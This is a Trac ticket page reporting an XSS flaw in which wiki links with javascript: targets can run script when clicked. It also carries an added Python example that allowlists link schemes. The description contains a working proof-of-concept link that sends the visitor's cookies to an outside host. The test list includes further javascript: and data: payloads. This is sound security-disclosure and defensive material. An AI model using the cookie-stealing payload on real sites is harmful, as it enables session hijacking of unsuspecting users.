Opened 14 years ago
Last modified 14 years ago
#9557 closed defect
User-assisted XSS risk via javascript: links — at Version 3
Reported by: | | Owned by: |
---|---|---|---
Priority: | high | Milestone: | 0.11.8
Component: | general | Version: | 0.11-stable
Severity: | major | Keywords: | security
Cc: | | Branch: |
Release Notes: | | |
API Changes: | | |
Internal Changes: | | |
Description (last modified by )
[javascript://%0Alocation='https://mattmccutchen.net/private/trac-javscript-link?'+encodeURIComponent(document.cookie); Click here to send me your cookies.]
This should be blocked by checking link targets against the same set of safe schemes that the HTML sanitizer uses.
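As an added illustration of the check the description asks for (this is not Trac's code and not the fix that was committed for this ticket), the following Python snippet extracts the scheme a browser would actually see for a wiki link target and compares it against an allowlist. The allowlist `SAFE_SCHEMES` is an assumed set modelled on what an HTML sanitizer typically permits; the sample targets are constructed for the demonstration. It normalises the target the way browsers do before parsing (leading/trailing controls and spaces stripped, tab/CR/LF removed, scheme lower-cased), so variants such as `" JaVaScRiPt:"` or `"java\tscript:"` are caught, and it treats targets without a scheme as relative links, which are left alone.

```python
import html
import re

# Assumed allowlist, in the spirit of the safe-scheme set an HTML sanitizer
# keeps. Anything not listed (javascript:, data:, vbscript:, ...) is rejected.
SAFE_SCHEMES = frozenset({"http", "https", "ftp", "mailto", "file"})

# A URL scheme is an ASCII letter followed by letters, digits, '+', '-', '.'
# and ends at the first ':'. "wiki/Page:Sub" has no scheme because '/' is not
# a scheme character, so it is parsed as a relative path.
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

# Characters browsers strip from the ends of a URL before parsing
# (C0 controls and space), plus the three they remove anywhere in it.
_C0_AND_SPACE = "".join(map(chr, range(0x21)))
_STRIPPED_ANYWHERE = re.compile(r"[\t\r\n]")


def link_scheme(target):
    """Return the lower-cased scheme a browser would see for ``target``,
    or None if the target is relative (has no scheme)."""
    cleaned = _STRIPPED_ANYWHERE.sub("", target).strip(_C0_AND_SPACE)
    match = _SCHEME_RE.match(cleaned)
    if match is None:
        return None
    return match.group(1).lower()


def is_safe_link_target(target):
    """True if the target is relative or uses a scheme in SAFE_SCHEMES.

    The '//%0A' trick in the report lives after the scheme, so it never
    affects this decision: 'javascript' is read off the front regardless.
    """
    scheme = link_scheme(target)
    return scheme is None or scheme in SAFE_SCHEMES


def render_link(target, label):
    """Render a wiki link as an anchor only when its target is safe;
    otherwise emit the escaped label text with no link at all."""
    if not is_safe_link_target(target):
        return html.escape(label)
    return '<a href="%s">%s</a>' % (html.escape(target, quote=True),
                                    html.escape(label))


if __name__ == "__main__":
    # Constructed sample targets, including the shape used in the report.
    samples = [
        "javascript://%0Aalert(document.cookie)",
        " JaVaScRiPt:alert(1)",
        "java\tscript:alert(1)",
        "data:text/html,<b>x</b>",
        "https://trac.edgewall.org/",
        "mailto:someone@example.invalid",
        "wiki/Page:Sub",
    ]
    for target in samples:
        print("%-40r scheme=%-12r safe=%s" % (
            target, link_scheme(target), is_safe_link_target(target)))
```

The `render_link` helper shows the blocking behaviour the description proposes: an unsafe target degrades to plain text rather than an anchor, so the page still renders but nothing is clickable.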
Change History (4)
comment:1 by , 14 years ago
comment:2 by , 14 years ago
Milestone: | → 0.12.1 |
---|---|
Priority: | normal → high |
Severity: | normal → major |
Interesting. Thanks for the report!
Maybe even for 0.11.7.1?
comment:3 by , 14 years ago
Description: | modified (diff) |
---|
And removed the actual link before too many people click on it :)